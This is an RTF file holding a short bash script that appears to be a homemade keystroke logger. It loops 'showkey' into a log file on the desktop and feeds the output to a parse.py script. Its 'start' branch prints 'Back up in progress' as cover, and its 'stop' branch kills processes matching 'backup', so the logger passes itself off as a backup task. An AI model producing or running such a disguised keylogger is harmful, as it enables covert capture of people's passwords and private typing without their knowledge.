{\rtf1\ansi\ansicpg1252\cocoartf1504
{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;\csgray\c100000;}
\margl1440\margr1440\vieww10800\viewh8400\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs24 \cf0 \
\
#!/bin/bash\
if [[ $1 == "stop" ]]; then\
	   python /Users/chrislonergan/desktop/parse.py\
	   #it should log aything it can even before the backup if its timed out\
	   kill $(ps aux | awk '/[b]ackup/ \{print $2\}') #the most elegant way to kill this process!\
	   exit #exit the script itself\
fi\
if [[ $1 == "start" ]]; then\
	   echo "Back up in progress........"\
fi	   \
while true\
do\
	showkey > /Users/chrislonergan/desktop/testlogger.txt\
	python /Users/chrislonergan/desktop/parse.py\
done}